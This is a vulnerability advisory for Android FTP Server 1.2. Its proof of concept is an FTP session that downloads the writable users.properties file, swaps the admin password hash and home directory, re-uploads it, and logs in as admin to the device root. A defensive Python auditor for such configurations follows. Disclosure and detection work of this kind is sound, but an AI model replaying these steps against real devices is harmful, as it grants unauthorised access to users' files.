
Android FTP Server 1.2 Privilege Escalation

Posted Sep 9, 2013
Authored by Larry W. Cashdollar

Android FTP Server version 1.2 exposes the configuration file with full read and write permissions. A malicious party can overwrite the credentials for the administrator and escalate privileges.

tags | exploit
MD5 | c59f87bb2a7d3a30d4077bbd4f8c474c

Remote access to Android ftp server 1.2 configuration file allows login as admin 
Date: 9/7/2013
Author: Larry W. Cashdollar, @_larry0 
Download: http://www.amazon.com/888bid-com-Android-FTP-Server/dp/B00COVVAZM/ref=sr_1_1?s=mobile-apps
Description: "Transfer files between Android devices and computers without a USB cable and Windows software driver. Transfer files to and from your Android device over the Internet. Use Windows Explorer to transfer files between your Android device and your computer by drag and drop. You can add additional users with read only permission for download, and read and write permission for both upload and download."
Vulnerability: The FTP server exposes its configuration file and allows read/write access to it, allowing a remote user to overwrite the credentials for the admin login and gain full access to the file system on the device.
PoC
Edit the users.properties file and re-upload.
Connected to 192.168.0.29.
220 Service ready for new user.
Name (192.168.0.29:larry): android
331 User name okay, need password for android.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> cd ftpConfig
250 Directory changed to /ftpConfig
ftp> ls
229 Entering Passive Mode (|||49825|)
150 File status okay; about to open data connection.
-rw------- 1 user group 679 Sep 7 16:37 users.properties
226 Closing data connection.
ftp> get users.properties
local: users.properties remote: users.properties
229 Entering Passive Mode (|||59616|)
150 File status okay; about to open data connection.
100% |********************************************| 695 9.60 MiB/s --:-- ETA
226 Transfer complete.
695 bytes received in 00:00 (121.85 KiB/s)
ftp>
If we take a look at the users.properties file:
#Generated file - don't edit (please)
#Sat Sep 07 16:13:44 EDT 2013
ftpserver.user.android.enableflag=true
ftpserver.user.admin.maxloginnumber=0
ftpserver.user.android.writepermission=true
ftpserver.user.android.idletime=0
ftpserver.user.admin.homedirectory=/mnt/sdcard <-change to /
ftpserver.user.admin.writepermission=true
ftpserver.user.admin.maxloginperip=0
ftpserver.user.android.homedirectory=/sdcard
ftpserver.user.admin.userpassword=21232F297A57A5A743894A0E4A801FC3 <- replace with 23594328\:070A6394BF17CD0A401F12ACC021714F 'android' password [1]
ftpserver.user.admin.downloadrate=0
ftpserver.user.admin.enableflag=true
ftpserver.user.admin.idletime=0
ftpserver.user.admin.uploadrate=0
ftpserver.user.android.userpassword=23594328\:070A6394BF17CD0A401F12ACC021714F
Upload the file as the android/android user to ftpConfig/users.properties. The next time the FTP server is started (on/off button in the app interface) you can log in as admin.
Log in as admin/android:
ftp> user admin
331 User name okay, need password for admin.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> dir
229 Entering Passive Mode (|||52585|)
150 File status okay; about to open data connection.
dr-x------ 3 user group 0 Jul 11 20:09 acct
d--x------ 3 user group 0 Aug 17 09:09 cache
d--x------ 3 user group 0 Jul 11 20:09 config
dr-x------ 3 user group 0 Dec 31 1969 d
d--x------ 3 user group 0 Sep 16 2012 data
dr-x------ 3 user group 0 Jul 11 20:15 dev
d--x------ 3 user group 0 Sep 2 14:07 dropbox
dr-x------ 3 user group 0 Mar 29 13:48 etc
dr-x------ 3 user group 0 Jul 11 20:09 mnt
dr-x------ 3 user group 0 Dec 31 1969 proc
d--x------ 3 user group 0 Feb 26 2013 root
d--x------ 3 user group 0 Dec 31 1969 sbin
drwx------ 3 user group 0 Sep 7 15:09 sdcard
dr-x------ 3 user group 0 Jul 11 20:09 sys
dr-x------ 3 user group 0 Mar 29 13:49 system
dr-x------ 3 user group 0 Mar 29 13:49 vendor
-r-------- 1 user group 118 Dec 31 1969 default.prop
---------- 1 user group 94200 Dec 31 1969 init
---------- 1 user group 1677 Dec 31 1969 init.goldfish.rc
---------- 1 user group 11658 Dec 31 1969 init.omap4430.rc
---------- 1 user group 14869 Dec 31 1969 init.rc
-r-------- 1 user group 0 Dec 31 1969 ueventd.goldfish.rc
-r-------- 1 user group 840 Dec 31 1969 ueventd.omap4430.rc
-r-------- 1 user group 4203 Dec 31 1969 ueventd.rc
226 Closing data connection.
ftp>

Tested on Kindle Fire & Droid Bionic.
[1] MD5 of admin, http://www.md5-hash.com/md5-hashing-decrypt/21232f297a57a5a743894a0e4a801fc3 but didn't allow me to login when I used admin/admin.
Vendor: Not notified.
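
A defensive check for the condition this advisory describes, as an added example that is not part of the original advisory or the app's code: it parses a users.properties file and flags enabled accounts that can write to the credential store, have the filesystem root as home, store a bare 32-hex digest, or share a password hash with another account. The sample input is constructed, and the on-device path /sdcard/ftpConfig/users.properties is an assumption inferred from the session above.

```python
import posixpath
import re

# Constructed sample, modelled on the users.properties shown in the advisory.
SAMPLE = r"""
#Generated file - don't edit (please)
ftpserver.user.android.enableflag=true
ftpserver.user.android.writepermission=true
ftpserver.user.android.homedirectory=/sdcard
ftpserver.user.android.userpassword=23594328\:070A6394BF17CD0A401F12ACC021714F
ftpserver.user.admin.enableflag=true
ftpserver.user.admin.writepermission=true
ftpserver.user.admin.homedirectory=/
ftpserver.user.admin.userpassword=23594328\:070A6394BF17CD0A401F12ACC021714F
"""

def parse_users(text):
    """Return {user: {attribute: value}} from ftpserver.user.<name>.<attr>=<value> lines."""
    users = {}
    for line in text.splitlines():
        m = re.match(r"ftpserver\.user\.([^.]+)\.([^=]+)=(.*)", line.strip())
        if m:
            user, attr, value = m.groups()
            users.setdefault(user, {})[attr] = value.replace("\\:", ":").strip()
    return users

# config_path is an assumption: where the credential file sits on the device.
def audit(text, config_path="/sdcard/ftpConfig/users.properties"):
    """Flag settings that let an FTP login reach or rewrite the credential store."""
    users, findings, seen = parse_users(text), [], {}
    for name, u in sorted(users.items()):
        if u.get("enableflag") != "true":
            continue
        home = posixpath.normpath(u.get("homedirectory", "/"))
        inside = home == "/" or config_path.startswith(home.rstrip("/") + "/")
        if inside and u.get("writepermission") == "true":
            findings.append((name, "can overwrite the server's own users.properties"))
        if home == "/":
            findings.append((name, "home directory is the filesystem root"))
        pw = u.get("userpassword", "")
        if re.fullmatch(r"[0-9A-Fa-f]{32}", pw):
            findings.append((name, "unsalted MD5 password hash"))
        if pw and pw in seen:
            findings.append((name, "password hash identical to user " + seen[pw]))
        seen.setdefault(pw, name)
    return findings
```

Any "can overwrite" finding means the credential file lives inside an FTP-writable tree; the fix is to keep it in app-private storage outside every user's home directory.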
